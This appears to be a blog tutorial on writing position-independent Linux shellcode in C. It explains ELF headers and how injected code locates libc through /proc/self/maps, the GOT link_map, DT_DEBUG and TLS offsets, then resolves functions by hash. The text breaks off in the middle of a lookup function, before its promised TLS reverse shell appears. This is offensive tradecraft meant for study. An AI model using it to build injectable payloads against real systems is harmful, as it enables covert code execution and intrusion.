Shellcode: A reverse shell for Linux in C with support for TLS/SSL

Shellcode: A reverse shell in C for Linux with support for TLS/SSL

  1. Introduction
  2. History
  3. Definitions
    1. Position-independent code (PIC)
    2. Position-independent executable (PIE)
    3. Thread Local Storage or Transport Layer Security (TLS)
    4. Address Space Layout Randomization (ASLR)
    5. Executable and Link Format (ELF)
  4. Base of Host Process
    1. Arbitrary Code Segment Address
    2. Process File System (procfs)
  5. ELF Layout
    1. File Header
    2. Program Header
    3. Section Header
    4. Dynamic Structure
    5. Symbol Structure
  6. Base of C Library (libc)
    1. Process File System (procfs)
    2. Global Offset Table (DT_PLTGOT)
    3. Debug Structure (DT_DEBUG)
    4. Thread Local Storage (TLS)
  7. Resolving Address of Functions
    1. ELF Hash Table (DT_HASH)
    2. GNU Hash Table (DT_GNU_HASH)
    3. Dynamic Symbol Table (DT_SYMTAB, DT_DYNSYM)
    4. Using Hash Algorithm (SHT_SYMTAB, SHT_DYNSYM)
  8. Loading Shared Objects
    1. __libc_dlopen_mode and __libc_dlsym
    2. Using /etc/ld.so.conf.d/
  9. Reverse Shell using SSL/TLS
    1. Data Table
    2. Strings
    3. Compiling
    4. Testing
  10. Summary

1. Introduction

This post will describe how to implement a position-independent code for Linux that can resolve the address of functions in the GNU C Library. The GNU Compiler Collection on an AMD64 build of Debian Linux will be used to compile a source code in C and extract the shellcode from binary. Once you’re familiar with the entire process, writing shellcode for other architectures should be easier. There are many tutorials about writing shellcode for Linux using system calls, but very few, if any at all, using the GNU C Library. The lack of tutorials can be attributed to the fact that process management, file system operations and network connectivity, can be easily implemented on Linux using system calls. In contrast with Linux, the Windows kernel is based on subsystems where the invocation of system calls is not a simple straight forward process. Due to the complexity of system calls on windows, it’s necessary to resolve the address of wrapper functions in Dynamic-link Libraries to do anything useful. This is why tutorials about writing shellcode in C for Windows well outnumber those for Linux.

For additional reading material, I would recommend reading Cheating the ELF – Subversive Dynamic Linking to Libraries by the grugq and the book Linux Binary Analysis by Ryan “elfmaster” O’Neill. There’s a lot of free reading material online that you can find with any good search engine. A PoC can be found here. The following screenshot shows the shellcode connected to the TCP/IP tool ncat that comes bundled with nmap.

ncat

2. History

The following table ordered in chronological order, highlights some examples of those using C to implement shellcode. There are probably many more than what I’ve listed. Feel free to email me the details of anyone else and I’ll update accordingly.

August 1999 Sebastian “stealth” Krahmer from Team TESO publishes Hellkit 1.1, a tool that converts C code into shellcode for Linux.
July 2003 Inspired by Hellkit, the author of scapy, Philippe Biondi publishes shellforge that uses a combination of C header files and Python to convert a C source code into a shellcode for Linux.
September 2003 Dave Aitel from ImmunitySec publishes MOSDEF, a C-like compiler that generates shellcode for Windows and Linux.
September 2006 Benjamin Caillat publishes WiShMaster, a tool that generates shellcode for Windows from a C source code.
May 2010 Didier Stevens publishes article on writing shellcode for Windows using C.
July 2010 Nick Harbour publishes article on writing shellcode for Windows using C.
November 2011 Radare publish ragg-cc, a shellcode compiler based on gcc and sflib (shellforge).
August 2013 Matt Graeber publishes article on writing shellcode for Windows using C.
November 2013 Shellforge G4 published. It’s a fork of shellforge now maintained by Albert Sellarès.
May 2014 humeafo publishes a shellcode compiler for windows that uses llvm/clang.
December 2015 Binary Ninja publish a shellcode compiler for Windows and Linux. Target architectures include x86, x64, arm, armeb, aarch64, mips, mipsel, ppc, ppcel.
May 2016 Jack Ullrich publishes article on writing shellcode for Windows using C.
May 2016 Phrack publish issue #69 with article by Justin “fishstiqz” Fisher that describes using gcc-mingw to generate windows shellcode in C.
June 2016 Guillaume Delugré publishes Shell-Factory, a tool that uses C++ to generate shellcode for Linux.
August 2016 Ixty publishes shellcode generator that derives a cross-platform shellcode for Linux targetting x86, amd64, aarch32 and aarch64.
November 2016 Ionut Popescu publishes a shellcode compiler for Windows.
Jan 2018 SheLLVM publishes a shellcode compiler for Windows.

3. Definitions

A brief description of some abbreviations used in this post are provided to those unfamiliar with what they mean.

3.1 Position-independent code (PIC)

When a PIC is executed, it should successfully run regardless of where it resides in memory which is compulsory for any shellcode. Unless a target binary is statically linked, dependencies should always be resolved dynamically.

3.2 Position-independent executables (PIE)

Executable binaries made entirely from PIC are mandatory by some systems lacking a Memory Management Unit. However, it’s also used by Address Space Layout Randomization to increase the difficulty of exploiting vulnerabilities. The version of Debian I’m working with has a build of GCC that enables PIE generated binaries by default.

3.3 Thread Local Storage / Transport Layer Security (TLS)

TLS is synonymous with the protocol that protects the vast majority of online communications, but it can also refer to a local area of memory containing global variables that are only accessible to a single thread.

3.4 Address Space Layout Randomization (ASLR)

ASLR is a technique invented by The PaX Team and published in July 2001. It is intended to mitigate against the exploitation of vulnerabilities by randomizing the memory addresses of a process, including the base of the executable, the stack, the heap and libraries. ASLR is not used for statically linked binaries.

3.5 Executable and Link Format

The original specification for the Executable and Link Format (ELF) published in May 1995 by the Linux Foundation. Before attempting to locate the base address of the GNU C Library and any of its exported functions, it’s important to familiarize yourself with the structure of an ELF binary.

4. Base of Host Process

There are three ways to obtain the base address of the host process, or two depending on where the shellcode resides in memory. For shellcode running inside an executable segment, simply read the value of the instruction pointer/program counter and then repeatedly subtract the value of PAGE_SIZE (usually 4096 bytes) from that (aligned) pointer until a valid ELF header is found. If the shellcode is running from executable memory allocated by the mmap function, we can try reading the address from /proc/self/maps using system calls or somehow obtain an arbitrary address from the stack or heap. You can also try reading the base address of libc.so from the Thread Local Storage (TLS) and obtain the link_map structure that contains the base address. I discuss this last approach in section 6.4 when finding the base of libc.so

4.1 Arbitrary Code Address

The get_rip() function with AMD64 assembly inlined simply loads the current value of the Instruction Pointer (IP) into the RAX register before returning. The get_base function will then compare the first 32-bits or 4-bytes of address with what is normally found at the start of an ELF binary. The search continues by subtracting PAGE_SIZE or 4096 bytes until it either finds the base address or crashes. There are of course ways to avoid crashing using system calls.

void* get_rip(void) {
    void* ret;

    __asm__ __volatile__ (
      "lea (%%rip), %%rax\n"
      ".globl get_rip_label	\n"
      "get_rip_label:		    \n"
      "mov %%rax, %0" : "=r"(ret));

    return ret;
}

void *get_base(void* addr) {
    uint64_t base = (uint64_t)addr;
    
    // align down
    base &= -4096;
    
    // equal to ELF?
    while (*(uint32_t*)base != 0x464c457fUL) {
      base -= 4096;
    }
    return (void*)base;
}

4.2 Process File System

/proc/self/maps contains a list of memory addresses, the permissions and the path of module mapped into that memory space. The first address found should belong to the host process. The following code will read the first address, convert the string to binary and return. The system calls are using inline assembly that might look suspicious.

uint64_t hex2bin(const char hex[]) {
    uint64_t r=0;
    char     c;
    int      i;
    
    for(i=0; i<16; i++) {
      c = hex[i];
      if(c >= '0' && c <= '9') { 
        c = c - '0';
      } else if(c >= 'a' && c <= 'f') {
        c = c - 'a' + 10;
      } else if(c >= 'A' && c <= 'F') {
        c = c - 'A' + 10;
      } else break;
      r *= 16;
      r += c;
    }
    return r;
}

void *get_base(void) {
    int  maps;
    void *addr;
    char line[32];
    int  str[8];
    
    // /proc/self/maps
    str[0] = 0x6f72702f;
    str[1] = 0x65732f63;
    str[2] = 0x6d2f666c;
    str[3] = 0x00737061;
    str[4] = 0;
    
    maps = _open((char*)str, O_RDONLY, 0);
    if(!maps) return NULL;
    
    _read(maps, line, 16);
    _close(maps);
    
    addr = (void*)hex2bin(line);
    return addr;
}

If the system has patches by Grsecurity installed and GRKERNSEC_PROC_MEMMAP is enabled, this code will not work because the option removes addresses from /proc/[pid]/[smaps|maps|stat].

5. ELF Layout

Parsing ELF files in memory is required if you want to find the address of functions. I will only discuss what’s necessary to locate the symbol, string and hash tables.

5.1 File Header

The most important header of all. Every valid ELF executable and shared object should begin with this file header. The binary is interpreted using the following structure.

typedef struct {
  unsigned char e_ident[EI_NIDENT]; /* File identification.              */
  Elf64_Half  e_type;               /* File type.                        */
  Elf64_Half  e_machine;            /* Machine architecture.             */
  Elf64_Word  e_version;            /* ELF format version.               */
  Elf64_Addr  e_entry;              /* Entry point.                      */
  Elf64_Off   e_phoff;              /* Program header file offset.       */
  Elf64_Off   e_shoff;              /* Section header file offset.       */
  Elf64_Word  e_flags;              /* Architecture-specific flags.      */
  Elf64_Half  e_ehsize;             /* Size of ELF header in bytes.      */
  Elf64_Half  e_phentsize;          /* Size of program header entry.     */
  Elf64_Half  e_phnum;              /* Number of program header entries. */
  Elf64_Half  e_shentsize;          /* Size of section header entry.     */
  Elf64_Half  e_shnum;              /* Number of section header entries. */
  Elf64_Half  e_shstrndx;           /* Section name strings section.     */
} Elf64_Ehdr;

The only fields we need to concern ourselves with for the shellcode are e_ident, e_phoff, e_phnum, e_shoff and e_shnum. The following shows the header for /bin/ls using: readelf -h /bin/ls

  ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              DYN (Shared object file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x5430
  Start of program headers:          64 (bytes into file)
  Start of section headers:          128816 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         9
  Size of section headers:           64 (bytes)
  Number of section headers:         30
  Section header string table index: 29

5.2. Program Header

To resolve the address of functions, we only need to work with PT_DYNAMIC and PT_LOAD types. PT_LOAD indicates a loadable program segment such as code (.text) or data (.data). An ELF binary should always have at least one PT_LOAD header, but if PT_DYNAMIC is missing, this indicates the binary has been linked statically and requires resolving functions via the section headers read from disk. Of course, you can always use hardcoded addresses.

typedef struct {
  Elf64_Word  p_type;               /* Entry type.                       */
  Elf64_Word  p_flags;              /* Access permission flags.          */
  Elf64_Off   p_offset;             /* File offset of contents.          */
  Elf64_Addr  p_vaddr;              /* Virtual address in memory image.  */
  Elf64_Addr  p_paddr;              /* Physical address (not used).      */
  Elf64_Xword p_filesz;             /* Size of contents in file.         */
  Elf64_Xword p_memsz;              /* Size of contents in memory.       */
  Elf64_Xword p_align;              /* Alignment in memory and file.     */
} Elf64_Phdr;

Example of dumping program headers for /bin/ls using: readelf -l /bin/ls

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  PHDR           0x0000000000000040 0x0000000000000040 0x0000000000000040
                 0x00000000000001f8 0x00000000000001f8  R E    0x8
  INTERP         0x0000000000000238 0x0000000000000238 0x0000000000000238
                 0x000000000000001c 0x000000000000001c  R      0x1
      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x000000000001e184 0x000000000001e184  R E    0x200000
  LOAD           0x000000000001e388 0x000000000021e388 0x000000000021e388
                 0x0000000000001260 0x0000000000002440  RW     0x200000
  DYNAMIC        0x000000000001edb8 0x000000000021edb8 0x000000000021edb8
                 0x00000000000001f0 0x00000000000001f0  RW     0x8
  NOTE           0x0000000000000254 0x0000000000000254 0x0000000000000254
                 0x0000000000000044 0x0000000000000044  R      0x4
  GNU_EH_FRAME   0x000000000001ab74 0x000000000001ab74 0x000000000001ab74
                 0x000000000000082c 0x000000000000082c  R      0x4
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     0x10
  GNU_RELRO      0x000000000001e388 0x000000000021e388 0x000000000021e388
                 0x0000000000000c78 0x0000000000000c78  R      0x1

The LOAD header with Offset FileSiz 0x1e184 is the .text segment. We know this because the flags have Read(R) and Execute(E). The other LOAD header has Read(R) and Write(W) flags, and indicates the .data segment. The only time you will see all three together (RWE) is in the OMAGIC format or a potentially malicious binary, of course. The following code when provided the base address of an ELF will return the first program header of type, or zero if one can’t be found.

// return pointer to program header
Elf64_Phdr *elf_get_phdr(void *base, int type) {
    int        i;
    Elf64_Ehdr *ehdr;
    Elf64_Phdr *phdr;
    
    // sanity check on base and type
    if(base == NULL || type == PT_NULL) return NULL;
    
    // ensure this some semblance of ELF header
    if(*(uint32_t*)base != 0x464c457fUL) return NULL;
    
    // ok get offset to the program headers
    ehdr=(Elf64_Ehdr*)base;
    phdr=(Elf64_Phdr*)(base + ehdr->e_phoff);
    
    // search through list to find requested type
    for(i=0; i<ehdr->e_phnum; i++) {
      // if found
      if(phdr[i].p_type == type) {
        // return pointer to it
        return &phdr[i];
      }
    }
    // return NULL if not found
    return NULL;
}

5.3 Section Headers

There are at least two ways to calculate the number of entries in the symbol table. The first is by dividing Elf64_Shdr.sh_size for SHT_SYMTAB or SHT_DYNSYM by sizeof(Elf64_Sym) or DT_SYMENT from the dynamic section. The other way is using the nchain value from DT_HASH structure. The problem is that DT_HASH is not always available. In its place will be DT_GNU_HASH that does not indicate how many entries are in the symbol table. For the shellcode, I use a method that works for both static and dynamically linked binaries, but it requires opening the file on disk and mapping into memory.

typedef struct {
       Elf64_Word      sh_name;       /* index to name of section in string table */
       Elf64_Word      sh_type;       /* type of section                          */
       Elf64_Xword     sh_flags;      /* section flags                            */
       Elf64_Addr      sh_addr;       /* memory address of section                */
       Elf64_Off       sh_offset;     /* file offset for section                  */
       Elf64_Xword     sh_size;       /* size of section                          */
       Elf64_Word      sh_link;       /* index to associated                      */
       Elf64_Word      sh_info;       /* extra info about section                 */
       Elf64_Xword     sh_addralign;  /* aligned address                          */
       Elf64_Xword     sh_entsize;    /* size of entry if section is a table      */
} Elf64_Shdr;

The only fields required here are sh_type, sh_offset, sh_size and sh_link. An example of processing the symbol table via section headers is in get_proc_address3.

5.4 Dynamic Structure

The .dynamic section or table contains a list of dynamic entries each of which can be interepreted using the following structure.

typedef struct {
  Elf64_Sxword  d_tag;              /* Entry type.    */
  union {
    Elf64_Xword d_val;              /* Integer value. */
    Elf64_Addr  d_ptr;              /* Address value. */
  } d_un;
} Elf64_Dyn;

The following d_tag values can be used to find specific types. A d_tag value of DT_NULL indicates where the section/table ends.

Type Description Value d_un
DT_PLTGOT Pointer to the Procedure Linkage Table / Global Offset Table 3 d_ptr
DT_HASH ELF hash used to locate symbol. 4 d_ptr
DT_GNU_HASH GNU style hash used to locate symbol. 0x6ffffef5 d_ptr
DT_STRTAB Pointer to the string table. 5 d_ptr
DT_SYMTAB Pointer to the symbol table 6 d_ptr
DT_SYMENT The size of a symbol entry 11 d_val
DT_SONAME Index in string table to the Shared Object name 14 d_val
DT_DEBUG Pointer to an r_debug structure containing the link_map 21 d_ptr
Dynamic section at offset 0x1edb8 contains 27 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [libselinux.so.1]
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
 0x000000000000000c (INIT)               0x34c8
 0x000000000000000d (FINI)               0x15c4c
 0x0000000000000019 (INIT_ARRAY)         0x21e388
 0x000000000000001b (INIT_ARRAYSZ)       8 (bytes)
 0x000000000000001a (FINI_ARRAY)         0x21e390
 0x000000000000001c (FINI_ARRAYSZ)       8 (bytes)
 0x000000006ffffef5 (GNU_HASH)           0x298
 0x0000000000000005 (STRTAB)             0x1010
 0x0000000000000006 (SYMTAB)             0x350
 0x000000000000000a (STRSZ)              1501 (bytes)
 0x000000000000000b (SYMENT)             24 (bytes)
 0x0000000000000015 (DEBUG)              0x0
 0x0000000000000003 (PLTGOT)             0x21f000
 0x0000000000000002 (PLTRELSZ)           2544 (bytes)
 0x0000000000000014 (PLTREL)             RELA
 0x0000000000000017 (JMPREL)             0x2ad8
 0x0000000000000007 (RELA)               0x1770
 0x0000000000000008 (RELASZ)             4968 (bytes)
 0x0000000000000009 (RELAENT)            24 (bytes)
 0x000000006ffffffb (FLAGS_1)            Flags: PIE
 0x000000006ffffffe (VERNEED)            0x1700
 0x000000006fffffff (VERNEEDNUM)         1
 0x000000006ffffff0 (VERSYM)             0x15ee
 0x000000006ffffff9 (RELACOUNT)          192
 0x0000000000000000 (NULL)               0x0

Take a look at the following .dynamic section for libc.so and notice the type of SONAME which is “shared object name”. To read this, add Elf64_Dyn.d_un.d_val for DT_SONAME to the Elf64_Dyn.d_un.d_ptr for DT_STRTAB and it will give you a pointer to the string “libc.so.6”

Dynamic section at offset 0x198ba0 contains 26 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [ld-linux-x86-64.so.2]
 0x000000000000000e (SONAME)             Library soname: [libc.so.6]
 .....

The following code is used to locate a dynamic type.

uint64_t elf_get_delta(void *base) {
    Elf64_Phdr *phdr;
    uint64_t   low;
    
    // get pointer to PT_LOAD header
    // first should be executable
    phdr = elf_get_phdr(base, PT_LOAD);
    
    if(phdr != NULL) {
      low = phdr->p_vaddr;
    }
    return (uint64_t)base - low;
}

// return pointer to first dynamic type found
Elf64_Dyn *elf_get_dyn(void *base, int tag) {
    Elf64_Phdr *dynamic;
    Elf64_Dyn  *entry;
    
    // 1. obtain pointer to DYNAMIC program header
    dynamic = elf_get_phdr(base, PT_DYNAMIC);

    if(dynamic != NULL) {
      entry = (Elf64_Dyn*)(dynamic->p_vaddr + elf_get_delta(base));
      // 2. obtain pointer to type
      while(entry->d_tag != DT_NULL) {
        if(entry->d_tag == tag) {
          return entry;
        }
        entry++;
      }
    }
    return NULL;
}

5.5 Symbol Structure

If a binary is being read from disk, the section headers can be used to calculate the location of the symbol table and how many entries it has. The symbol and table entries can be identified by checking the sh_type field of each section header for SHT_SYMTAB or SHT_DYNSYM. You may be asking yourself, what’s the difference?. Typically, object files will contain a .symtab section for the linker, but no .dynsym section. ELF binaries that are dynamically linked will contain a .dynsym section, but no .symtab section. However, if the application is statically linked, the binary will only contain a .symtab section. In practice, you should check for both simultaneously in the event that only one exists.

If a binary is being read from memory that was already mapped by the ELF dynamic linker/loader, the section headers won’t be available and there’s only the dynamic program header (PT_DYNAMIC) to work with. DT_STRTAB, DT_SYMTAB, DT_HASH or DT_GNU_HASH are required for locating the address of functions using the .dynamic section. get_proc_address demonstrates how to lookup by ELF or GNU hash.

typedef struct {
  Elf64_Word    st_name;            /* String table index of name.   */
  unsigned char st_info;            /* Type and binding information. */
  unsigned char st_other;           /* Reserved (not used).          */
  Elf64_Half    st_shndx;           /* Section index of symbol.      */
  Elf64_Addr    st_value;           /* Symbol value.                 */
  Elf64_Xword   st_size;            /* Size of associated object.    */
} Elf64_Sym;
Symbol table '.dynsym' contains 136 entries:
   Num:    Value          Size Type    Bind   Vis      Ndx Name
     0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __ctype_toupper_loc@GLIBC_2.3 (2)
     2: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __uflow@GLIBC_2.2.5 (3)
     3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND getenv@GLIBC_2.2.5 (3)
     4: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND sigprocmask@GLIBC_2.2.5 (3)
     5: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __snprintf_chk@GLIBC_2.3.4 (4)
     6: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND raise@GLIBC_2.2.5 (3)
     7: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND free@GLIBC_2.2.5 (3)
     8: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND abort@GLIBC_2.2.5 (3)
     9: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __errno_location@GLIBC_2.2.5 (3)
    10: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND strncmp@GLIBC_2.2.5 (3)

6. Base of C Library

Although I describe obtaining the base address of the host process in section 4, it’s only necessary to obtain the base address of libc.so. We will now examine a number of ways to do this.

6.1 Process Maps File (procfs)

A popular method is by parsing /proc/[pid]/maps where [pid] is the target process id. Using “self” in place of [pid] will query the current process space.

int read_line(int fd, char *buf, int buflen) {
    int  len;
    
    if(buflen==0) return 0;
    
    for(len=0; len < (buflen - 1); len++) {
      // read a byte. exit on error
      if(!_read(fd, &buf[len], 1)) break;
      // exit loop when new line found
      if(buf[len] == '\n') {
        buf[len] = 0;
        break;
      }
    }
    return len;
}

int is_exec(char line[]) {
    char *s = line;
    
    // find the first space
    // but ensure we don't skip newline or null terminator
    while(*s && *s != '\n' && *s != ' ') s++;
    
    // space?
    if(*s == ' ') {
      do {
        s++; // skip 1
        // execute flag?
        if(*s == 'x') return 1;
      // until we reach null terminator, newline or space
      } while (*s && *s != '\n' && *s != ' ');
    }
    return 0;
}

void *get_module_handle1(const char *module) {
    int  maps;
    void *base=NULL, *start_addr;
    char line[PATH_MAX];
    int  str[8], len;
    
    // /proc/self/maps
    str[0] = 0x6f72702f;
    str[1] = 0x65732f63;
    str[2] = 0x6d2f666c;
    str[3] = 0x00737061;
    str[4] = 0;
    
    // 1. open /proc/self/maps
    maps = _open((char*)str, O_RDONLY, 0);
    if(!maps) return NULL;
    
    // 2. until EOF or module found
    for(;;) {
      // 3. read a line
      len = read_line(maps, line, BUFSIZ);
      if(len == 0) break;
      // 4. remove last character
      line[len] = 0;
      // if permissions disallow execution, skip it
      if(!is_exec(line)) {
        continue;
      }
      start_addr = (void*)hex2bin(line);
      // 5. first address should be the base of host process
      // if no module is requested, return this address
      if(module == 0) {
        base = start_addr;
        break;
      }
      // 6. check if module name is in line
      if(_strstr(line, module)) {
        base = start_addr;
        break;
      }
    }
    _close(maps);
    return base;
}

6.2 Global Offset Table (DT_PLTGOT)

In May 2002, the grugq provided an an example of how to locate the link_map structure stored in the GOT that can then be used to resolve the base address of libc.so. In 2007, herm1t shows another way in INT 0x80? No, thank you! that finds it using the address of libc.so functions rather than the link_map. Either way works, but the method shown here is based on the post by the grugq. The following structure defines the link_map. Note, the structure defined in link.h is much more detailed, but this is really all that’s required to obtain the base address of shared objects.

struct link_map {
    ElfW(Addr) l_addr;		/* Difference between the address in the ELF
				   file and the addresses in memory.  */
    char *l_name;		/* Absolute file name object was found in.  */
    ElfW(Dyn) *l_ld;		/* Dynamic section of the shared object.  */
    struct link_map *l_next, *l_prev; /* Chain of loaded objects.  */
};

The link_map can be found in various ways, but the most popular seems to be via dynamic structures of type DT_PLTGOT and DT_DEBUG.

GOT Index Description
0 Relative Virtual Address of .dynamic program header (PT_DYNAMIC)
1 Pointer to link_map structure.
2 Pointer to _dl_runtime_resolve function in dynamic linker/loader

The following function will retrieve the address of GOT, extract a pointer to the link_map structure and search for the requested module based on string. If no module is provided, the first entry in the list (which happens to be host process) is returned. This is similar to how GetModuleHandle works on windows. However, it’s worth noting that because of how shared objects on Linux are named, the module name provided to this function doesn’t need to be exact. A partial name is sufficient, but that makes it more prone to return the wrong entry.

void *get_module_handle2(const char *module) {
    Elf64_Phdr      *phdr;
    Elf64_Dyn       *got;
    void            *addr=NULL, *base;
    uint64_t        *ptrs;
    struct link_map *map;
    
    // 1. get the base of host ELF
    base = get_base();
    // 2. obtain pointer to dynamic program header
    phdr = (Elf64_Phdr*)elf_get_phdr(base, PT_DYNAMIC);
    
    if(phdr != NULL) {
      // 3. obtain global offset table
      got = elf_get_dyn(base, DT_PLTGOT);
      if(got != NULL) {
        ptrs = (uint64_t*)got->d_un.d_ptr;
        map   = (struct link_map *)ptrs[1];
        // 4. search through link_map for module
        while (map != NULL) {
          // 5 if no module provided, return first in the list
          if(module == NULL) {
            addr = (void*)map->l_addr;
            break;
          // otherwise, check by name
          } else if(_strstr(map->l_name, module)) {
            addr = (void*)map->l_addr;
            break;
          }
          map = (struct link_map *)map->l_next;
        }
      }
    }
    return addr;
}

6.3 Debug Structure (DT_DEBUG)

The link_map is also available via the debug type or DT_DEBUG.

struct r_debug {
    int32_t r_version;          /* version, always one */
    struct link_map * r_map;    /* list of loaded libraries */
    void (*r_brk)(void);        /* marker function address */
    int32_t r_state;            /* zero if the state of r_map is consistent */
    uintptr_t r_ldbase;         /* linker base address (this is where the linker was loaded after relocation) */
};

The following code shows how to resolve using DT_DEBUG. It’s essentially the same as get_module_handle2 that uses DT_PLTGOT. In fact, it might be possible to use the same function for two separate types if we only use 64-bit pointers assuming r_version is aligned by 8 bytes.

void *get_module_handle3(const char *module) {
    Elf64_Phdr      *phdr;
    Elf64_Dyn       *dbg;
    void            *addr=NULL, *base;
    struct r_debug  *debug;
    struct link_map *map;
    
    // 1. get the base of host ELF
    base = get_base();    
    // 2. obtain pointer to dynamic program header
    phdr = (Elf64_Phdr*)elf_get_phdr(base, PT_DYNAMIC);
    
    if(phdr != NULL) {
      // 3. obtain global offset table
      dbg = elf_get_dyn(base, DT_DEBUG);
      if(dbg != NULL) {
        debug = (struct r_debug*)dbg->d_un.d_ptr;
        map   = (struct link_map *)debug->r_map;
        // 4. search through link_map for module
        while (map != NULL) {
          // 5 if no module provided, return first in the list
          if(module == NULL) {
            addr = (void*)map->l_addr;
            break;
          // otherwise, check by name
          } else if(_strstr(map->l_name, module)) {
            addr = (void*)map->l_addr;
            break;
          }
          map = (struct link_map *)map->l_next;
        }
      }
    }
    return addr;
}

6.4 Thread Local Storage (TLS)

herm1t writes in Highway to libc that a pointer to TLS memory for glibc can be found in the Thread Control Block (TCB) accessible via the gs register on 32-bit systems or the fs register on 64-bit systems. If you look at the value of fs on a 64-bit system, it appears to be empty. Accessing fs will still return information from the TCB, but at least on my 64-bit system, it did not contain an address for TLS as expected. While the approach described by herm1t didn’t work on this system, there are some interesting addresses at negative offsets. Read A Deep dive into (implicit) Thread Local Storage for more detailed information on TLS.

  fs-8*7  : main_arena                - heap memory
  fs-8*10 : _nl_C_LC_CTYPE_class
  fs-8*11 : _nl_C_LC_CTYPE_toupper
  fs-8*12 : _nl_C_LC_CTYPE_tolower
  fs-8*14 : _res
  fs-8*15 : _nl_global_locale

The following code will use _nl_C_LC_CTYPE_class to locate the base address of libc.so on my own system, but may not work elsewhere without modification.

void *get_base2(void) {
    uint64_t *fs, base;
    
    // retrieve the address of _nl_C_LC_CTYPE_class
    asm ("mov %%fs:0xffffffffffffffb0,%%rax":"=a"(fs));
    
    base = (uint64_t)fs;
    
    // align down
    base &= -4096;
    
    // equal to ELF?
    while (*(uint32_t*)base != 0x464c457fUL) {
      base -= 4096;
    }
    return (void*)base;
}

Another way simply using the pointer to TCB is presented. It uses a brute force approach and works for dynamic and statically linked binaries. Again, this was tested on my system and may require modification. It works by first obtaining a file descriptor to /dev/random and if it can successfully write the contents of address we want to read, we check for the ELF file header.

void *get_base3(void) {
    uint64_t base;
    int      fd, str[4];
    
    asm ("mov %%fs:0,%%rax" : "=a" (base));
    
    // align down
    base &= -4096;
    
    // "/dev/random"
    str[0] = 0x7665642f;
    str[1] = 0x6e61722f;
    str[2] = 0x006d6f64;

    fd = _open((char*)str, O_WRONLY, 0);
    
    for(;;) {
      if(_write(fd, (char*)base, 4) == 4) {
        if (*(uint32_t*)base == 0x464c457fUL) {
          break;
        }
      }
      base -= 4096;
    }
    _close(fd);
    
    return (void*)base;
}

7. Resolving Address of Functions

At this point we should have the base address of host process and the base address of libc. However, even if you only managed to retrieve the base address of libc, that would be sufficient to do everything else.

7.1 ELF Hash Table (DT_HASH)

Instead of repeating information already available, let me refer you to a couple of posts about this.

  1. Hashin’ the elves by herm1t
  2. ELF: symbol lookup via DT_HASH by FLAPENGUIN

The following code is derived from those two posts.

uint32_t elf_hash(const uint8_t *name) {
    uint32_t h = 0, g;
    
    while (*name) {
      h = (h << 4) + *name++;
      g = h & 0xf0000000;
      if (g)
        h ^= g >> 24;
      h &= ~g;
    }
    return h;
}

void *elf_lookup(
  const char *name, 
  uint32_t *hashtab, 
  Elf64_Sym *sym, 
  const char *str) 
{
    uint32_t  idx;
    uint32_t  nbuckets = hashtab[0];
    uint32_t* buckets  = &hashtab[2];
    uint32_t* chains   = &buckets[nbuckets];
    
    for(idx = buckets[elf_hash(name) % nbuckets]; 
        idx != 0; 
        idx = chains[idx]) 
    {
      // does string match for this index?
      if(!_strcmp(name, sym[idx].st_name + str))
        // return address of function
        return (void*)sym[idx].st_value;
    }
    return NULL;
}

7.2 GNU Hash Table (DT_GNU_HASH)

In June 2006, support for the DT_GNU_HASH table was added and this apparently speeds up searches by 50%. The hash function was posted to comp.lang.c all the way back in 1991 by Dan Bernstein. Deroko from ARTeam discusses it here while FLAPENGUIN discusses it here. The following code is derived from the post by FLAPENGUIN.

#define ELFCLASS_BITS 64

uint32_t gnu_hash(const uint8_t *name) {
    uint32_t h = 5381;

    for(; *name; name++) {
      h = (h << 5) + h + *name;
    }
    return h;
}

struct gnu_hash_table {
    uint32_t nbuckets;
    uint32_t symoffset;
    uint32_t bloom_size;
    uint32_t bloom_shift;
    uint64_t bloom[1];
    uint32_t buckets[1];
    uint32_t chain[1];
};

void* gnu_lookup(
    const char* name,          /* symbol to look up */
    const void* hash_tbl,      /* hash table */
    const Elf64_Sym* symtab,   /* symbol table */
    const char* strtab         /* string table */
) {
    struct gnu_hash_table *hashtab = (struct gnu_hash_table*)hash_tbl;
    const uint32_t  namehash    = gnu_hash(name);

    const uint32_t  nbuckets    = hashtab->nbuckets;
    const uint32_t  symoffset   = hashtab->symoffset;
    const uint32_t  bloom_size  = hashtab->bloom_size;
    const uint32_t  bloom_shift = hashtab->bloom_shift;
    
    const uint64_t* bloom       = (void*)&hashtab->bloom;
    const uint32_t* buckets     = (void*)&bloom[bloom_size];
    const uint32_t* chain       = &buckets[nbuckets];

    uint64_t word = bloom[(namehash / ELFCLASS_BITS) % bloom_size];
    uint64_t mask = 0
        | (uint64_t)1 << (namehash % ELFCLASS_BITS)
        | (uint64_t)1 << ((namehash >> bloom_shift) % ELFCLASS_BITS);

    if ((word & mask) != mask) {
        return NULL;
    }

    uint32_t symix = buckets[namehash % nbuckets];
    if (symix < symoffset) {
        return NULL;
    }

    /* Loop through the chain. */
    for (;;) {
        const char* symname = strtab + symtab[symix].st_name;
